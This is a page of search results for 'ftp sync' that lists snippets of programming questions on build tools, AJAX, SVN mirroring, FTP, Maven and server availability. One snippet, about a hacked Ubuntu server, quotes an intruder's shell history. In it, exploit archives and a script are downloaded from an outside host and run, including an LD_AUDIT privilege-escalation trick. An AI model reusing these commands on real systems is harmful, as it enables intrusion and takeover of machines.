Search Results

Search found 5793 results on 232 pages for 'ftp sync'.

Page 208/232 | < Previous Page | 204 205 206 207 208 209 210 211 212 213 214 215  | Next Page >

  • Team Build Reports as "Failed" Even Though All Targets Succeeded

    - by benjy
    Hi, I've written a custom MSBuild script to be used with Team Build, as I am storing PHP in TFS and of course it isn't compiled. My custom script calls the CoreGet target to get the latest version of the files, and the copies them, ZIPs, them, and FTPs the ZIP archive to a testing server. All of that is working fine. The problem I am having is that despite the build succeeding - see the output in BuildLog.txt - Done executing task "BuildStep". Done building target "FTP" in project "TFSBuild.proj". Done executing task "CallTarget". Done building target "EndToEndIteration" in project "TFSBuild.proj". Done Building Project "C:\Documents and Settings\tfsservice\Local Settings\Temp\Code\PHP\BuildType\TFSBuild.proj" (EndToEndIteration target(s)). Build succeeded. 0 Warning(s) 0 Error(s) the build still reports as having failed. The log from Visual Studio looks like so: Anyone know how I can make it report as having succeeded? Thanks very much in advance, Benjy P.S.: Please let me know if anyone would find having the whole build script helpful. Thanks!

    Read the article

  • RPC for java/python with rest support, HTML monitoring and goodies

    - by Ran
    Here's my set of requirements: I'm looking for an RPC framework such as thrift, avro, protobuf (when adding services to it) which supports: Easy and intuitive IDL. No serial numbers, no manual versioning, simple... avro is a good example for this. Works with Java and Python Supports both fast binary prorocol, as well as HTTP based restful style. I'd like to be able to use it for both backend-to-backend communication (java-java or python-java) as well as frontend-to-backend communication (javascript to java). The rest support needs to include &param=value input as get/post requests (configurable per request) and output in three possible formats: json, jsonp, XML. Compact, fast, backward compatible, easy to upgrade etc... Provides some nice monitoring interfaces such as: JMX, web page status reports (e.g. packets in, packets out, error rate etc) Ops friendly... no need to take the whole site down to release new versions Both sync and asyc communication ... other goodies are welcome... Is there something out there? So far I've looked at thrift and avro and they are both nice in some ways, but don't check all my list. Thanks

    Read the article

  • Javascript check of a form, not waiting for ajax response

    - by Y.G.J
    this is a part of the check in my form function check(theform) { var re = /^\w[0-9A-Za-z]{5,19}$/; if (!re.test(theform.username.value)) { alert("not valid username"); theform.username.focus(); return false; } $.ajax({ type: "POST", url: "username.asp", data: "username="+theform.username.value, success: function(msg){ username = msg; if (!username) { alert("username already in use"); return false; } } }); var re = /^\w[0-9A-Za-z]{5,19}$/; if (!re.test(theform.password.value)) { alert("not valid password"); theform.password.focus(); return false; } } for some reason of sync... it check the username then duplicated username with the ajax and not waiting for respond and jump to the password check. i don't want to insert the rest of the code to isreadystate (or what ever it is) because i might move the username duplicate check to the end... and then the function will end before the ajax anyway what should i do?

    Read the article

  • svnsync looses revision properties although hook installed

    - by roesslerj
    Hello all! I have a pretty weird problem. We have setup an SVN-Mirror via cronjob (because it needs to go from inside to outside of a firewall, so no post-commit-hook possible) and svnsync. We installed a pre-revprop-hook just as told. Everything seems to work fine, except that it doesn't. E.g. when manually executing the script. # svnsync --non-interactive sync file://<path-to-mirror> --source-username <usr> --source-password <pwd> Committed revision 19817. Copied properties for revision 19817. No error, no complaints. But if checking for the revision properties it says: # svnlook info <path-to-mirror> 0 # svn info -r HEAD file://<path-to-mirror> 2>&1 Path: <root-of-mirror> URL: file://<path-to-mirror> Repository Root: file://<path-to-mirror> Repository UUID: <uid> Revision: 19817 Node Kind: directory Last Changed Rev: 19817 So somehow the author and timestamp information gets lost. But we need that information for our internal processes. Since no error or warning is produced I have absolutely no idea even where to start to look. Everything is local (except for the remote master), so there are no server-logs to look at. Any ideas how I could approach that problem, or even better -- how to solve it? Any ideas appreciated.

    Read the article

  • How to achieve high availability?

    - by tanyehzheng
    My boss wants to have a system that takes into concern of continent wide catastrophic event. He wants to have two servers in US and two servers in Asia (1 login server and 1 worker server in each continent). In the event that earthquake breaks the connection between the two continents, both should work alone. When the connection is revived, they should sync each other back to normal. External cloud system not allowed as he has no confidence. The system should take into account of scalability which means addition of new servers should be easy to configure. The servers should be load balanced. The connection between the servers should be very secure(encrypted and send through SSL although SSL takes care of encryption). The system should let one and only one user log in with one account. (beware of latency between continent and two users sharing account may reach both login server at the same time) Please help. I'm already at the end of my wit. Thank you in advance.

    Read the article

  • FTPing a file to Mainframe using Java, Apache Common Net

    - by SKR
    I'm am trying to upload a file into mainframe server using FTP. My code is below FTPClient client = new FTPClient(); InputStream in = null; FileInputStream fis = null; try{ client.connect("10.10.23.23"); client.login("user1", "pass123"); client.setFileType(FTPClient.BINARY_FILE_TYPE); int reply ; reply = client.getReplyCode(); System.out.println("Reply Code:"+reply); if(FTPReply.isPositiveCompletion(reply)){ System.out.println("Positive reply"); String filename ="D:\\FILE.txt"; in = new FileInputStream(filename); client.storeFile("FILE.TXT", in); client.logout(); fis.close(); }else{ System.out.println("Negative reply"); } }catch(final Throwable t){ t.printStackTrace(); } The code gets struck in client.storeFile("FILE.TXT", in); I am unable to debug. Please suggest ways / solutions.

    Read the article

  • XBAP Browser Control - Invoking Click event of the html Input type button

    - by maharaj
    Hi, Here is what I have. 1.XBAP application with WPF Browser control, hosted on Page1.xaml 2.XBAP in Full Trust, certificate installed in client browser 3.Once the XBAP loaded, the browser control is navigated to some third party site. 4.We are using MVVM for XAML stuff So, when a certain page is loaded, I attach click event handler to the input button with id="submit" on the html page displayed in the browser control (used the code similar to whats in this URL http://social.msdn.microsoft.com/Forums/en-US/wpf/thread/a4f0e4d0-78bf-44c5-a3fe-8faf2e7a0568/). It works just fine as long as I dont make a wcf web service call in my ViewModel, before or after I attach this event hander. Idea is to invoke the click event for the html button and grab the data from the html page before calling the webservice to save data from the page. Here is the issue: When I make the wcf webservice call (sync or async, it doesnt matter) the click event doesnt happen but if I comment out the the code for wcf service call the click event of the html input of type button gets invoked. Any help would be appreciated. Thanks, Salil

    Read the article

  • mvn deploy to AWS (ssh via distributionManagement)

    - by Dexter
    I am working on deploying the WAR file to AWS using Maven. I am planning to use 'mvn deploy' for the same which would ssh the war file to AWS. I am following http://maven.apache.org/plugins/maven-deploy-plugin/examples/deploy-ssh-external.html. This is my POM file <project> ... <distributionManagement> <repository> <id>ssh-aws</id> <url>scpexe://<ec2 instance>.compute-1.amazonaws.com</url> </repository> </distributionManagement> <build> <extensions> <!-- Enabling the use of FTP --> <extension> <groupId>org.apache.maven.wagon</groupId> <artifactId>wagon-ssh-external</artifactId> <version>1.0-beta-6</version> </extension> </extensions> </build> .. </project> This is my settings.xml <server> <id>ssh-aws</id> <username>aws-user</username> </server> The only issue is that I am unable to figure out the url in distributionManagement node of pom.xml. I am able to ssh in the AWS server by the following. ssh -i ~/pemfile/pemfile-key.pem aws-user@<ec2 instance>.compute-1.amazonaws.com But when I run mvn clean deploy, I receive this.. Exit code: 1 - Permission denied (publickey). -> [Help 1] Thanks in advance.

    Read the article

  • Getting auth token for dropbox account from accountmanager in android

    - by user1490880
    I am trying to get auth token for a dropbox account configured in device from account manager. I am using accountManager.getAuthToken(account, "DROPBOX",null,Hello.this, new GetAuthTokenCallback(), null);//account" is dropbox account I am seeing a Allow/Deny page. I click on Allow, but the callback is not getting invoked at all and i dont get the auth token. I got the authtoken for a google account with this(with a different authtokentype). What i am missing. I am not sure about the authTokenType parameter for dropbox. Also are there any other parameter specific for dropbox like the bundle parameter that i am missing. Is this way possible for dropbox? Check below for the function parameters public AccountManagerFuture<Bundle> getAuthToken (Account account, String authTokenType, Bundle options, Activity activity, AccountManagerCallback<Bundle> callback, Handler handler) Link: http://developer.android.com/reference/android/accounts/AccountManager.html UPDATE I assume since we are able to create a dropbox account in android Accounts and Sync(Settings), there must be a dropbox authenticator that has all the functions in AbstractAccountAuthenticator implemented including getAuthToken(). So dropbox should support giving auth token i think. Also dropbox uses oauth1, whereas account manager uses outh 2.0. So is this an issue.Can anyone comment on this?

    Read the article

  • How to eliminate tearing from animation?

    - by MusiGenesis
    I'm running an animation in a WinForms app at 18.66666... frames per second (it's synced with music at 140 BPM, which is why the frame rate is weird). Each cel of the animation is pre-calculated, and the animation is driven by a high-resolution multimedia timer. The animation itself is smooth, but I am seeing a significant amount of "tearing", or artifacts that result from cels being caught partway through a screen refresh. When I take the set of cels rendered by my program and write them out to an AVI file, and then play the AVI file in Windows Media Player, I do not see any tearing at all. I assume that WMP plays the file smoothly because it uses DirectX (or something else) and is able to synchronize the rendering with the screen's refresh activity. It's not changing the frame rate, as the animation stays in sync with the audio. Is this why WMP is able to render the animation without tearing, or am I missing something? Is there any way I can use DirectX (or something else) in order to enable my program to be aware of where the current scan line is, and if so, is there any way I can use that information to eliminate tearing without actually using DirectX for displaying the cels? Or do I have to fully use DirectX for rendering in order to deal with this problem? Update: forgot a detail. My app renders each cell onto a PictureBox using Graphics.DrawImage. Is this significantly slower than using BitBlt, such that I might eliminate at least some of the tearing by using BitBlt?

    Read the article

  • Dynamic Auto updating (to UI, Grid) binding list in C# Winform?

    - by Dhana
    I'm not even sure if i'm doing this correctly. But basically I have a list of objects that are built out of a class/interface. From there, I am binding the list to a datagrid view that is on a Windows Form (C#) Here the list is a Sync list which will auto update the UI, in this case datagridview. Every thing works fine now, but now i would like to have the List should have an dynamic object, that is the object will have by default two static property (ID, Name), and at run time user will select remaining properties. These should be bind to the data grid. Any update on the list should be auto reflected in the grid. I am aware that, we can use dynamic objects, but i would like to know , how to approach for solution, datagridview.DataSource = myData; // myData is AutoUpdateList<IPersonInfo> Now IPersonInfo is the type of object, need to add dynamic properties for this type at runtime. public class AutoUpdateList<T> : System.ComponentModel.BindingList<T> { private System.ComponentModel.ISynchronizeInvoke _SyncObject; private System.Action<System.ComponentModel.ListChangedEventArgs> _FireEventAction; public AutoUpdateList() : this(null) { } public AutoUpdateList(System.ComponentModel.ISynchronizeInvoke syncObject) { _SyncObject = syncObject; _FireEventAction = FireEvent; } protected override void OnListChanged(System.ComponentModel.ListChangedEventArgs args) { try { if (_SyncObject == null) { FireEvent(args); } else { _SyncObject.Invoke(_FireEventAction, new object[] { args }); } } catch (Exception) { // TODO: Log Here } } private void FireEvent(System.ComponentModel.ListChangedEventArgs args) { base.OnListChanged(args); } } Could you help out on this?

    Read the article

  • GitHub solution for personal repo

    - by Luke Maurer
    So I've got my private SVN repo on my home server, and it has maybe 30 different modules thrown together in it, ranging from abortive throw-away larks to a few endeavors that might actually go somewhere someday. But a recent filesystem failure (BTW, never ever EVER use XFS without a battery-backed hardware RAID) has me spooked and thinking of using a DVCS for all that. I've also just had quite the swig of the Git koolaid, and I've been working with GitHub of late, so that's where I'm looking right now. Of course, it would be silly to shell out major cash for a separate private Git repo for every little project, and I don't want to have to be selective about what I throw up there (I love all my children :-D ), so I'll have to be somewhat creative about this. I can happily use SSH to my home box to use Git the way I've been using SVN, and I'm thinking from there I could amalgamate everything into, say, a big project with 30 submodules, which I then push to GitHub. What'd be a sane way to set this up? Does using submodules sound feasible? How do I sync it all to my private GitHub repo? Cron job? Git hook? I'd love to hear it if anyone's done something similar. I'm not really married to Git or GitHub, so a sufficiently compelling feature of another solution might sway me. But if your answer does involve a different system (especially a different VCS), be advised it'll be a tougher sell :-)

    Read the article

  • Achieving Thread-Safety

    - by Smasher
    Question How can I make sure my application is thread-safe? Are their any common practices, testing methods, things to avoid, things to look for? Background I'm currently developing a server application that performs a number of background tasks in different threads and communicates with clients using Indy (using another bunch of automatically generated threads for the communication). Since the application should be highly availabe, a program crash is a very bad thing and I want to make sure that the application is thread-safe. No matter what, from time to time I discover a piece of code that throws an exception that never occured before and in most cases I realize that it is some kind of synchronization bug, where I forgot to synchronize my objects properly. Hence my question concerning best practices, testing of thread-safety and things like that. mghie: Thanks for the answer! I should perhaps be a little bit more precise. Just to be clear, I know about the principles of multithreading, I use synchronization (monitors) throughout my program and I know how to differentiate threading problems from other implementation problems. But nevertheless, I keep forgetting to add proper synchronization from time to time. Just to give an example, I used the RTL sort function in my code. Looked something like FKeyList.Sort (CompareKeysFunc); Turns out, that I had to synchronize FKeyList while sorting. It just don't came to my mind when initially writing that simple line of code. It's these thins I wanna talk about. What are the places where one easily forgets to add synchronization code? How do YOU make sure that you added sync code in all important places?

    Read the article

  • How to cope with null results in SQL Tasks that return single rows in SSIS 2005?

    - by JSacksteder
    In a dataflow task, I can slip a rowcount into the processing flow and place the count into a variable. I can later use that variable to conditionally perform some other work if the rowcount was 0. This works well for me, but I have no corresponding strategy for sql tasks expected to return a single row. In that event, I'm returning those values into variables. If the lookup produces no rows, the sql task fails when assigning values into those variables. I can branch on that component failing, but there's a side effect of that - if I'm running the job as a SQL server agent job step, the step returns DTSER_FAILURE, causing the step to fail. I can tell the sql agent to disregard the step failure, but then I won't know if I have a legitimate error in that step. This seems harder than it should be. The only strategy I can think of is to run the same query with a count(*) aggregate and test if that returns a number 0 and if so running the query again without the count. That's ugly because I have the same query in two places that I need to keep in sync. Is there a better way?

    Read the article

  • Why can't I simply copy installed Perl modules to other machines?

    - by pistacchio
    Being very new to Perl but not to dynamic languages, I'm a bit surprised at how not straight forward the manage of modules is. Sure, cpan X does theoretically work, but I'm working on the same project from three different machines and OSs (at work, at home, testing in an external environment). At work (Windows 7) I have problem using cpan because of our firewall that makes ftp unusable At home (Mac OS X) it does work In the external environment (Linux CentOs) it worked after hours because I don't have root access and I had to configure cpan to operate as a non-root user I've tried on another server where I have an access. If the previous external environment is a VPS and so I have a shell access, this other one is a cheap shared hosting where I have no way to install new modules other than the ones pre-installed At the moment I still can't install Template under Windows. I've seen that as an alternative I could compile it and I've also tried ActiveState's PPM but the module is not existent there. Now, my perplexity is about Perl being a dynamic language. I've had all these kind of problems while working, for example, with C where I had to compile all the libraries for all the platform, but I thought that with Perl the approach would have been very similar to Python's or PHP's where in 90% of the cases copying the module in a directory and importing it simply works. So, my question: if Perl's modules are written in Perl, why the copy/paste approach will not work? If some (or some part) of the modules have to be compiled, how to see in CPAN if a module is Perl-only or it relies upon compiled libraries? Isn't there a way to download the module (tar, zip...) and use cpan to deploy it? This would solve my problem under Windows.

    Read the article

  • Ubuntu Server hack [closed]

    - by haxpanel
    Hi! I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked after this because my user has the only one ssh access. I found this in an ftp user .bash_history file: w uname -a ls -a sudo su wget qiss.ucoz.de/2010/.jpg wget qiss.ucoz.de/2010.jpg tar xzvf 2010.jpg rm -rf 2010.jpg cd 2010/ ls -a ./2010 ./2010x64 ./2.6.31 uname -a ls -a ./2.6.37-rc2 python rh2010.py cd .. ls -a rm -rf 2010/ ls -a wget qiss.ucoz.de/ubuntu2010_2.jpg tar xzvf ubuntu2010_2.jpg rm -rf ubuntu2010_2.jpg ./ubuntu2010-2 ./ubuntu2010-2 ./ubuntu2010-2 cat /etc/issue umask 0 dpkg -S /lib/libpcprofile.so ls -l /lib/libpcprofile.so LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping ping gcc touch a.sh nano a.sh vi a.sh vim wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh nano ubuntu10.sh ls -a rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2 ls -a wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh ls -a rm -rf ubuntu10.sh wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe rm -rf W2Ksp3.exe passwd The system is in a jail. Does it matter in the current case? What shall i do? Thanks for everyone!! I have done these: - ban the connected ssh host with iptables - stoped the sshd in the jail - saved: bach_history, syslog, dmesg, files in the bash_history's wget lines

    Read the article

  • Script to install and compile Python, Django, Virtualenv, Mercurial, Git, LessCSS, etc... on Dreamho

    - by tmslnz
    The Story After cleaning up my Dreamhost shared server's home folder from all the cruft accumulated over time, I decided to start afresh and compile/reinstall Python. All tutorials and snippets I found seemed overly simplistic, assuming (or ignoring) a bunch of dependencies needed by Python to compile all modules correctly. So, starting from http://andrew.io/weblog/2010/02/installing-python-2-6-virtualenv-and-virtualenvwrapper-on-dreamhost/ (so far the best guide I found), I decided to write a set-and-forget Bash script to automate this painful process, including along the way a bunch of other things I am planning to use. The Script I am hosting the script on http://bitbucket.org/tmslnz/python-dreamhost-batch/src/ The TODOs So far it runs fine, and does all it needs to do in about 900 seconds, giving me at the end of the process a fully functional Python / Mercurial / etc... setup without even needing to log out and back in. I though this might be of use for others too, but there are a few things that I think it's missing and I am not quite sure how to go for it, what's the best way to do it, or if this just doesn't make any sense at all. Check for errors and break Check for minor version bumps of the packages and give warnings Check for known dependencies Use arguments to install only some of the packages instead of commenting out lines Organise the code in a manner that's easy to update Optionally make the installers and compiling silent, with error logging to file failproof .bashrc modification to prevent breaking ssh logins and having to log back via FTP to fix it EDIT: The implied question is: can anyone, more bashful than me, offer general advice on the worthiness of the above points or highlight any problems they see with this approach? (see my answer to Ry4an's comment below) The Gist I am no UNIX or Bash or compiler expert, and this has been built iteratively, by trial and error. It is somehow going towards apt-get (well, 1% of it...), but since Dreamhost and others obviously cannot give root access on shared servers, this looks to me like a potentially very useful workaround; particularly so with some community work involved.

    Read the article

  • Images not showing in ie7 using jquery cycle and jCarouselLite plugin

    - by Geetha
    Hi All, I am using jquery cycle and jCarouselLite plugin to display images as slide. Images are getting displayed in ie7. but working perfect in ie6. Image Property inside the cycle control: Protocol: Not available Type: Not available Address(url): Not available Size: Not available Dimensions: 100X100 but control having the url. if i tried that image url separate it showing the image. Code: $('#slide').cycle({ fx: 'fade', continuous: true, speed: 7500, timeout: 55000, sync: 1 }); Html Code: <div id="slide"> <img src="samp1.jpg" width="664" height="428" border="0" /> <img src="samp2.jpg" width="664" height="428" border="0" /> <img src="samp3.jpg" width="664" height="428" border="0" /> <img src="samp4.jpg" width="664" height="428" border="0" /> <img src="samp5.jpg" width="664" height="428" border="0" /> <img src="samp6.jpg" width="664" height="428" border="0" /> <img src="samp7.jpg" width="664" height="428" border="0" /> <img src="samp8.jpg" width="664" height="428" border="0" /> </div> Geetha.

    Read the article

  • Strange Sql Server 2005 behavior

    - by Justin C
    Background: I have a site built in ASP.NET with Sql Server 2005 as it's database. The site is the only site on a Windows Server 2003 box sitting in my clients server room. The client is a local school district, so for data security reasons there is no remote desktop access and no remote Sql Server connection, so if I have to service the database I have to be at the terminal. I do have FTP access to update ASP code. Problem: I was contacted yesterday about an issue with the system. When I looked in to it, it seems a bug that I had solved nearly a year ago had returned. I have a stored procedure that used to take an int as a parameter but a year ago we changed the structure of the system and updated the stored procedure to take an nvarchar(10). The stored procedure somehow changed back to taking an int instead of an nvarchar. There is an external hard drive connected to the server that copies data periodically and has the ability to restore the server in case of failure. I would have assumed that somehow an older version of the database had been restored, but data that I know was inserted 7 days and 1 day before the bug occurred is still in the database. Question: Is there anyway that the structure of a Sql Server 2005 database can revert to a previous version or be restored to a previous version without touching the actual data? No one else should have access to the server so I'm going a little insane trying to figure out how this even happened. Any ideas?

    Read the article

  • Windows Azure - access webrole local storage from separate workerrole

    - by Brett Smith
    I'm running an application on windows azure, the MVC views need to be dynamic, I started by storing them as records in the database, but am quite keen to move them to a physical location. My concept was to create the physical file via code... which worked great and speeds up the page load dramatically. This was of course before I realised that the files were only available for the duration of the role Next I looked at a start up task to create the files when the role was started - however I then realised that any separate instances weren't going to sync up unless I monitored the database for changes. So I moved from a start up task to a function in the run method of the role that checks the database every 10 minutes to see if changes have occurred. The problem is that this seems to choke up the application (at least in the warm up stage). Ideally I would like to move the run function to it's own worker role that can sit there and push files out to web role instances, but I'm unsure on how I would go about accessing the web roles local storage from the worker role. Can anybody tell me whether this is actually possible? and hopefully point me in the right direction to achieve this? Just to clarify what I'm trying to achieve -View is created in user interface running on web role and stored in database -Separate web role (front end) has clientside application with virtualpath provider pointing Views requests to local storage (localresource) -separate worker role to create View structure and load this into clientside web role local storage

    Read the article

  • How to scale a PHP application (servers, mysql, memcache)

    - by Stéphane Goetz
    Hi, I'm currently creating a website for a social project in switzerland. And before there is an overflow of user, I want to prepare the application to scale. I answered by myself many questions but some are left. I explain what I want to do. First at the beginnning, the Application will have only one server (short time) with DNS, PHP, Mysql, Data, and memcache. Second Then I will split them in two DNS, Mysql, memcache Data, PHP Third Here is the problem, I don't know how to do it exactly here to keep the application running well. I could do : Front : Load Balancer, memcache, DNS Web 1 : PHP, DATA Web 2 : PHP, DATA Mysql This would be the scheme, all PHP sessions are kept in the DB. BUT, how do I sync the data? do I run a Rsync to keep them up to date. do I put them on a separate disk (network disk) to be sure ? but in this case, how can I do in case of user uploads ? and if the website gets more success and we have to go on greater structures, would'nt it create some latency on updates ? or would it be a good thing to go directly to amazon's web services ? some infos I use codeigniter as Framework. I use linux as webserver (distribution not chosen now, but should be Debian) Thanks in advance for your answers.

    Read the article

  • Editing a remote file on-the-fly with PHP

    - by user275074
    Hi, I have a requirement to edit a remote text file on-the-fly, the content of which currently stands at ~1Mb. I have tried a couple of approaches and both seem to be clunky or hog memory which I can't rely on. Thinking out logically what I'm trying to achieve is: FTP to a remote server. Download a copy of the file for backup purposes and store it somewhere locally. Open the remote file and add the necessary lines required. Remove lines from the remote file as per an array of un-required data generated from the local server. Is this possible? I've managed to code steps 1 and 2 but I'm having difficult with 3 and 4. The way I'm doing it now is to use fgets and return the whole string. Really, I don't want to do this as it involves manipulating and re-generating the whole string (and it's large) and then re-inserting it in between two markers in the remote file. Is there no way of manipulating the lines of text in the file on-the-fly?

    Read the article

  • Setup SVN/LAMP/Test Server/ on linux, where to start?

    - by John Isaacks
    I have a ubuntu machine I have setup. I installed apache2 and php5 on it. I can access the web server from other machines on the network via http://linux-server. I have subversion installed on it. I also have vsftpd installed on it so I can ftp to it from another computer on the network. Myself and other users currently use dreamweaver to checkin-checkout files directly from our live site to make changes. I want the connect to the linux server from pc. make the changes on the test server until ready and then pushed to the live site. I want to use subversion also into this workflow as well. but not sure what the best workflow is or how to set this up. I have no experience with linux, svn, or even using a test server, the checkin/out we are currently doing is the way I have always done it. I have hit many snags already just getting what I have setup because of my lack of knowledge in the area. Dreamweaver 5 has integration with subversion but I can't figure out how to get it to work. I want to setup and create the best workflow possible. I dont expect anyone to be able to give me an answer that will enlighten me enough to know everthing I need to know to do what I want to do (altough if possible that would be great) instead I am looking for maybe a knowledge path like answer. Like a general outline of what I need to do accompanied with links to learn how to do it. like read this book to learn linux, then read this article to learn svn, etc., then you should know what to do. I would be happy just getting it all setup, but I would like to know what I am actually doing while setting it up too.

    Read the article

  • lightweight/portable VCS for server-hopping DBA?

    - by Aaron
    I'm looking for a VCS that'll help me keep all of my work scripts in-sync. Requirements: Portable (as in flash drive, not code-level) Run on Windows XP and Server 2003+ No installation dependencies (Cygwin, perl, Python) I use Mercurial on my work machine for version control of the various T-SQL, ksh, perl, and CMD/BAT scripts that I maintain as a MS SQL Server DBA and Unix sysadmin. So far, hg has worked for my AIX boxes- I mount my home directory as I login, and deal with the repo as if it were local. I haven't been able to find a similar solution for the Windows machines I use. Most of them I do not have Local Admin rights; even if I did, I'd rather not install (and maintain) Python + Mercurial on all of them. I can't get to my home directory on them remotely, which leaves a client running on each machine as the only option. Bonus points for an answer that would let me use a single repo for both the Windows and Unix machines. :) I'm running WinXP, with heavy use of Cygwin and a CrunchBang VM.

    Read the article

  • Synchronizing in SQL Replication works when manually syncing, but not automatically

    - by Dominic Zukiewicz
    I'm using SQL Server 2005 to create a replication copy of the main databases, so that the reports can point to the replication copy instead of locking out our main databases. I have set up the 3 databases as publications and then 3 subscribers moving the transactions over to the subscribers, instantaneously I hope! What seems to be happening is that when using the "Insert Tracer" function, replication take publisher to distributor < 2 seconds, but to replicate to the subscribers can take over 7 minutes (and these are local databases on a SAN). This could be for 2 reasons: The SQL statements used to query the database are obtaining locks which are stopping the transactions updating the subscribers. The subscribers are just too busy for the replication to apply the changes. What seems to trouble me more, is that although the Replication Monitor / Insert Tracer are showing these statistics, if you use the "View Subscription Details" and then click Start, it will sync within seconds. My goal would be to have the data syncing (ideally) continuously, or every minute, perhaps I should reduce the batch size of the transactions? What am I doing wrong? [Note that the -Continuous flag is set!]

    Read the article

< Previous Page | 204 205 206 207 208 209 210 211 212 213 214 215  | Next Page >